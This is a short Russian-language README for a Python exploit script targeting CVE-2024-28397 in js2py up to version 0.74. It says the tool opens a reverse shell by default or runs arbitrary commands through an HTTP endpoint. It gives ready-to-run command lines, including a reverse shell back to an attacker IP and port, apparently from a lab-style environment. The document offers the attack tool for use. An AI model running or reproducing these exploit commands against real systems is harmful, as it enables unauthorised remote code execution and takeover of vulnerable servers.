
Python-скрипт эксплойта для CVE-2024-28397, нацеленный на js2py <= v0.74. Поддерживает реверс-шелл и выполнение пользовательских команд через HTTP-эндпоинт.
По умолчанию используется полезная нагрузка reverse shell и разрешён необязательный аргумент команды.
Эксплойт работает для js2py <= v0.74
requests (pip install requests)Обратная оболочка:
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
Пользовательская команда:
python exploit.py 10.129.227.108 /run_code --cmd "id"